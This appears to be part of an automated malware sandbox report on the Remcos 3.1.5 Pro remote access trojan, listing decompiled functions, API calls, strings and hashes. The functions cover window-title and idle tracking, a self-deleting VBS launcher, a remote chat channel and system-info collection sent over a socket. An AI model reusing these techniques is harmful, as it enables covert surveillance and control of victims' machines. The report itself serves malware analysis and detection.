								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
								E00409636(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					L00409C17(_t119);
					if(L00416B2E(_t119) < 0xea60) {
						L18:
						L00401ED0();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = L00416B2E(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E0040530D(_t77,  &_v80, E004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								L00416C32(_t127, _t50);
								L00408B82(_t119);
								L00401FA7();
								L00401FA7();
								L00401FA7();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						L00401ED0();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}






















                              0x00409197
                              0x0040919d
                              0x004091a0
                              0x004091a1
                              0x004091a3
                              0x004091a5
                              0x00409204
                              0x00409210
                              0x00409213
                              0x0040921d
                              0x00409225
                              0x0040922c
                              0x00409236
                              0x00409247
                              0x0040924d
                              0x0040925d
                              0x00409269
                              0x0040927d
                              0x00409282
                              0x00409289
                              0x00409290
                              0x004092ba
                              0x004092be
                              0x004092c6
                              0x004092cf
                              0x00409292
                              0x00409295
                              0x0040929c
                              0x0040929c
                              0x00409290
                              0x0040925d
                              0x004092d4
                              0x004092d6
                              0x004092e7
                              0x0040938f
                              0x00409393
                              0x00000000
                              0x004092ed
                              0x004092ed
                              0x004092f1
                              0x00409301
                              0x00409308
                              0x00409328
                              0x0040932b
                              0x0040935c
                              0x00409361
                              0x00409364
                              0x00409368
                              0x0040936f
                              0x00409378
                              0x00409381
                              0x0040938a
                              0x00000000
                              0x0040938a
                              0x0040930a
                              0x00409311
                              0x00409315
                              0x00409315
                              0x004093a1
                              0x00000000
                              0x004093a1
                              0x004092e7
                              0x004093a8
                              0x004093ae

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004091F9
                              • Sleep.KERNEL32(000001F4), ref: 00409204
                              • GetForegroundWindow.USER32 ref: 0040920A
                              • GetWindowTextLengthW.USER32(00000000), ref: 00409213
                              • GetWindowTextW.USER32 ref: 00409247
                              • Sleep.KERNEL32(000003E8), ref: 00409315
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                                • Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 107669343-3343415809
                              • Opcode ID: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
                              • Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
                              • Opcode Fuzzy Hash: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
                              • Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040B80B, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040B80B(void* __ebx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				short _v716;
				void* __edi;
				void* __ebp;
				void* _t36;
				void* _t37;
				void* _t40;
				void* _t54;
				void* _t67;
				void* _t68;
				void* _t79;

				_t79 = __ebx;
				L0040FB4B();
				_t36 = E00402469();
				_t37 = L00401F75(0x46c560);
				_t40 = E00410420(L00401F75(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
				_t140 = _t40;
				if(_t40 == 0) {
					GetModuleFileNameW(0,  &_v716, 0x208);
				}
				E00403086(_t79,  &_v124, L00416C32( &_v52, E004169EB( &_v76)), 0, _t140, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t79,  &_v100, E00403086(_t79,  &_v76, E0040425F(_t79,  &_v52, E0043918F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
				L00401ED0();
				L00401ED0();
				L00401F4D(_t79,  &_v28);
				_t54 = E0040425F(_t79,  &_v196, L"\"\"\", 0");
				E004032F1(E00403086(_t79,  &_v76, E00403010( &_v52, E00403086(_t79,  &_v148, E0040425F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
				_t67 = L00401ECB( &_v100);
				_t68 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v100), 0x45f714, 0x45f714, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}





















                              0x0040b80b
                              0x0040b816
                              0x0040b822
                              0x0040b82a
                              0x0040b84e
                              0x0040b858
                              0x0040b85a
                              0x0040b865
                              0x0040b865
                              0x0040b887
                              0x0040b890
                              0x0040b898
                              0x0040b8ca
                              0x0040b8d3
                              0x0040b8db
                              0x0040b8e3
                              0x0040b8f8
                              0x0040b93d
                              0x0040b945
                              0x0040b94d
                              0x0040b958
                              0x0040b963
                              0x0040b96e
                              0x0040b97b
                              0x0040b984
                              0x0040b98d
                              0x0040b9ab
                              0x0040b9d0
                              0x0040b9d0
                              0x0040b9d9
                              0x0040b9e1
                              0x0040b9f3

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B865
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B9C4
                              • ExitProcess.KERNEL32 ref: 0040B9D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                              • API String ID: 1913171305-2411266221
                              • Opcode ID: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
                              • Instruction ID: e165f019403b777232d5c6ec79ea45895c0ef20fb9be7ec1ee46aed41850c1d8
                              • Opcode Fuzzy Hash: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
                              • Instruction Fuzzy Hash: 67418F319100185ACB14FB62DC96DEE7739AF50744F10017FF406B20E2EF385E8ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044F2E4, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DecodePointer
                              • String ID: acos$asin$exp$log$log10$pow$sqrt$@
                              • API String ID: 3527080286-3098891844
                              • Opcode ID: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
                              • Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
                              • Opcode Fuzzy Hash: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
                              • Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004053B7, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147windowmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E004053B7(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t27;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t54;
				void* _t65;
				void* _t66;
				void* _t68;
				intOrPtr _t102;
				void* _t106;
				struct HWND__* _t109;
				signed int _t110;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;

				_t118 = __eflags;
				_t97 = __edx;
				_push(_t65);
				_t102 = _a4;
				E004020CC(_t65,  &_v104, __edx, __eflags, _t102 + 0x1c);
				SetEvent( *(_t102 + 0x34));
				_t27 = L00401F75( &_v108);
				E00404286( &_v108,  &_v60, 4, 0xffffffff);
				_t113 = (_t110 & 0xfffffff8) - 0x5c;
				E004020CC(_t65, _t113, _t97, _t118, 0x46c238);
				_t114 = _t113 - 0x18;
				E004020CC(_t65, _t114, _t97, _t118,  &_v76);
				L00416DD0( &_v140, _t97);
				_t115 = _t114 + 0x30;
				_t106 =  *_t27 - 0x3a;
				if(_t106 == 0) {
					_t66 = E0040A15B(L00401F75(L00401E29( &_v116, _t97, __eflags, 0)));
					__eflags = _t66;
					if(_t66 == 0) {
						L7:
						L00401E54( &_v116, _t97);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E0040A1B1(_t66, "DisplayMessage");
					_t42 = E0040A1B1(_t66, "GetMessage");
					_t100 = "CloseChat";
					 *0x46bae4 = _t42;
					_t43 = E0040A1B1(_t66, "CloseChat");
					_t116 = _t115 - 0x18;
					 *0x46bae8 = _t43;
					 *0x46bae1 = 1;
					E004020CC(_t66, _t116, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					L00404A6E(_t66, _t102, _t100, __eflags);
					L10:
					_t68 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t68,  &_v140);
					if(__eflags != 0) {
						_t116 = _t116 - 0x18;
						E0040208B(_t68, _t116, _t100, __eflags, _v140, _t48);
						_push(0x3b);
						L00404A6E(_t68, _t102, _t100, __eflags);
						HeapFree(_t68, 0, _v176);
					}
					goto L10;
				}
				_t109 = _t106 - 1;
				_t120 = _t109;
				if(_t109 != 0) {
					goto L7;
				}
				_t54 =  *0x46baec(L00401F75(L00401E29( &_v116, _t97, _t120, _t109)));
				_t121 = _t54;
				if(_t54 == 0) {
					goto L7;
				}
				E0040425F(_t65,  &_v80, 0x45f6a8);
				_t97 =  &_v84;
				L00416CF4(_t65, _t115 - 0x18,  &_v84);
				_push(0x3b);
				L00404A6E(_t65, _t102,  &_v84, _t121);
				L00401ED0();
				L4:
				while(GetMessageA( &_v52, _t109, _t109, _t109) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}
































                              0x004053b7
                              0x004053b7
                              0x004053c4
                              0x004053c7
                              0x004053ce
                              0x004053d6
                              0x004053e0
                              0x004053f4
                              0x004053f9
                              0x00405403
                              0x00405408
                              0x00405412
                              0x0040541b
                              0x00405420
                              0x00405423
                              0x00405426
                              0x004054e6
                              0x004054e8
                              0x004054ea
                              0x004054a8
                              0x004054ac
                              0x004054b5
                              0x004054be
                              0x004054c5
                              0x004054cb
                              0x004054cb
                              0x004054fd
                              0x00405504
                              0x00405509
                              0x0040550e
                              0x00405515
                              0x0040551a
                              0x0040551d
                              0x00405524
                              0x00405530
                              0x00405535
                              0x00405539
                              0x0040553e
                              0x00405547
                              0x00405557
                              0x00405559
                              0x0040555b
                              0x00405565
                              0x0040556a
                              0x0040556e
                              0x00405579
                              0x00405579
                              0x00000000
                              0x00405559
                              0x0040542c
                              0x0040542c
                              0x0040542f
                              0x00000000
                              0x00000000
                              0x00405443
                              0x0040544a
                              0x0040544c
                              0x00000000
                              0x00000000
                              0x00405457
                              0x0040545f
                              0x00405465
                              0x0040546a
                              0x0040546e
                              0x00405477
                              0x00000000
                              0x0040547c
                              0x00405493
                              0x0040549e
                              0x0040549e
                              0x004054a6
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 004053D6
                              • GetMessageA.USER32 ref: 00405484
                              • TranslateMessage.USER32(?), ref: 00405493
                              • DispatchMessageA.USER32 ref: 0040549E
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 00405541
                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405579
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                              • String ID: CloseChat$DisplayMessage$GetMessage
                              • API String ID: 2956720200-749203953
                              • Opcode ID: 02051dfd2f121262e23d97fa20897eb118d393fedf734998bddfa0f823dbe46e
                              • Instruction ID: 40e2d3d5fc2c9ffc40a8a8c2273da8ce5b9fbac120eee0586a17121859013f1e
                              • Opcode Fuzzy Hash: 02051dfd2f121262e23d97fa20897eb118d393fedf734998bddfa0f823dbe46e
                              • Instruction Fuzzy Hash: E8419371604301ABC600BB75DD5A9AF7BA9EF81315F40053FF505A31E2EF389909CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004179B3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F4D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E0041669D(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00416F6C(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403010( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403010( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								__ecx =  &_v584;
								L5:
								__eax = L00401ED0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208);
				_t39 = E0040425F(_t54,  &_v560, _a4);
				_t40 = E0040425F(_t54,  &_v636, "\\");
				E00403010(_t77, E00403010( &_v600, L00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				return _t77;
				goto L16;
			}



























                              0x004179b3
                              0x004179c2
                              0x004179c4
                              0x004179ca
                              0x004179d2
                              0x004179d5
                              0x004179d8
                              0x004179de
                              0x00000000
                              0x004179e5
                              0x00000000
                              0x00000000
                              0x004179ef
                              0x004179f3
                              0x004179f9
                              0x004179fd
                              0x00000000
                              0x00000000
                              0x00417a10
                              0x00000000
                              0x00000000
                              0x00417a1a
                              0x00000000
                              0x00000000
                              0x00417a24
                              0x00417a29
                              0x00417a2b
                              0x00417a84
                              0x00417a93
                              0x00417a9a
                              0x00417aa3
                              0x00417aa5
                              0x00417aa9
                              0x00417ab0
                              0x00417ab4
                              0x00417ab9
                              0x00417abd
                              0x00417ac2
                              0x00417ac6
                              0x00417a02
                              0x00417a02
                              0x00000000
                              0x00417a2d
                              0x00417a32
                              0x00417a41
                              0x00417a48
                              0x00417a51
                              0x00417a53
                              0x00417a57
                              0x00417a5e
                              0x00417a62
                              0x00417a67
                              0x00417a6b
                              0x00417a70
                              0x00417a74
                              0x00417a79
                              0x00417a06
                              0x00417a06
                              0x00000000
                              0x00417a06
                              0x00000000
                              0x00000000
                              0x00417ad0
                              0x00000000
                              0x00000000
                              0x00417ad7
                              0x00000000
                              0x00000000
                              0x00417ade
                              0x00417ae3
                              0x00417aee
                              0x00000000
                              0x00000000
                              0x004179de
                              0x00417af3
                              0x00417b0a
                              0x00417b19
                              0x00417b28
                              0x00417b50
                              0x00417b5a
                              0x00417b63
                              0x00417b6c
                              0x00417b75
                              0x00417b7e
                              0x00417b8b
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-1609423294
                              • Opcode ID: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
                              • Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
                              • Opcode Fuzzy Hash: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
                              • Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413012, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 112sleepfileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E00413012(void* __ecx, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_t97 = __eflags;
				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
				L00401ED0();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				L00401ED0();
				E004020B5(0,  &_v28);
				_t92 = 0;
				do {
					_t35 = L00401ECB( &_v76);
					_t87 =  &_v28;
					E00417334(_t35,  &_v28);
					Sleep(0x64);
					_t92 = _t92 + 1;
				} while (L00409DB7() != 0 && _t92 < 0x4b0);
				if(L00409DB7() == 0) {
					DeleteFileW(L00401ECB( &_v76));
					E00404818(_t55,  &_v180, 1);
					_t95 = _t94 - 0x10;
					_t93 = 0x46bacc;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t46 = E004049D2(_t87);
					_t102 = _t46;
					if(_t46 != 0) {
						_t93 = _t95 - 0x18;
						_t16 =  &_a4; // 0x412c62
						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52, _t16, 0x46c238), _t102,  &_v28);
						_push(0x97);
						L00404A6E(_t55,  &_v180, _t49, _t102);
						L00401FA7();
						L00404DD5( &_v180);
						_t55 = 1;
					}
					L00404DF9(_t55,  &_v180, _t93);
				}
				L00401FA7();
				L00401ED0();
				L00401FA7();
				return _t55;
			}



















                              0x00413012
                              0x0041303c
                              0x00413045
                              0x0041304a
                              0x00413073
                              0x0041307c
                              0x00413084
                              0x00413089
                              0x0041308b
                              0x0041308e
                              0x00413093
                              0x00413098
                              0x0041309f
                              0x004130a8
                              0x004130ae
                              0x004130c4
                              0x004130d3
                              0x004130e1
                              0x004130e6
                              0x004130f1
                              0x004130f6
                              0x004130f7
                              0x004130f8
                              0x004130f9
                              0x004130fa
                              0x004130ff
                              0x00413101
                              0x00413109
                              0x0041310b
                              0x00413121
                              0x00413127
                              0x00413132
                              0x0041313a
                              0x00413145
                              0x0041314a
                              0x0041314a
                              0x00413152
                              0x00413152
                              0x0041315a
                              0x00413162
                              0x0041316a
                              0x00413177

                              APIs
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • Sleep.KERNEL32(00000064), ref: 0041309F
                              • DeleteFileW.KERNEL32(00000000), ref: 004130D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                              • String ID: /t $\sysinfo.txt$b,A$dxdiag$open$temp
                              • API String ID: 2701014334-3646109375
                              • Opcode ID: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
                              • Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
                              • Opcode Fuzzy Hash: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
                              • Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004188B1, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 59%
                              			E004188B1(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ca6c(__ebx);
				 *0x46bebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043A8D6(_t36, "CONOUT$", "a", E00436395(1));
				E00431810(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E004047F8(_t85, _t30, 7);
			}




















                              0x004188b1
                              0x004188bb
                              0x004188bd
                              0x004188c3
                              0x004188cb
                              0x004188d1
                              0x004188d6
                              0x004188d6
                              0x004188dd
                              0x004188f0
                              0x00418903
                              0x00418911
                              0x00418912
                              0x00418912
                              0x00418915
                              0x00418916
                              0x0041891c
                              0x00418922
                              0x0041892a
                              0x0041892b
                              0x0041892b
                              0x0041892e
                              0x0041892f
                              0x00418938
                              0x00418939
                              0x0041893a
                              0x00418941
                              0x00418942
                              0x00418942
                              0x00418945
                              0x00418946
                              0x0041894f
                              0x00418950
                              0x00418951
                              0x00418959
                              0x0041895a
                              0x0041895a
                              0x0041895d
                              0x0041895e
                              0x00418962
                              0x0041896a
                              0x0041896c
                              0x00418974
                              0x00418975
                              0x00418975
                              0x00418978
                              0x00418979
                              0x00418979
                              0x0041898b
                              0x0041898e
                              0x0041899a

                              APIs
                              • AllocConsole.KERNEL32(00000001), ref: 004188BD
                              • GetConsoleWindow.KERNEL32 ref: 004188C3
                              • ShowWindow.USER32(00000000,00000000), ref: 004188D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ConsoleWindow$AllocShow
                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.5 Pro$CONOUT$
                              • API String ID: 3461962499-2226434288
                              • Opcode ID: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
                              • Instruction ID: bfc95b620952df2fd153268bde35307eb28a127fe5abf82b9ef8951bce9e7c52
                              • Opcode Fuzzy Hash: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
                              • Instruction Fuzzy Hash: BB212B72808B0525EF10AF155C01FD6B765AF52704F004297E88C7B281EBA66DCA476D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044087E, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0044087E(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4571f8) {
					L0043EE85(_t52);
					_t26 = _a4;
				}
				L0043EE85( *((intOrPtr*)(_t26 + 0x3c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x30)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x34)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x38)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x28)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x2c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x40)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x44)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00440744(5,  &_v8);
				_v8 =  &_a4;
				return E00440794(4,  &_v8);
			}




                              0x00440884
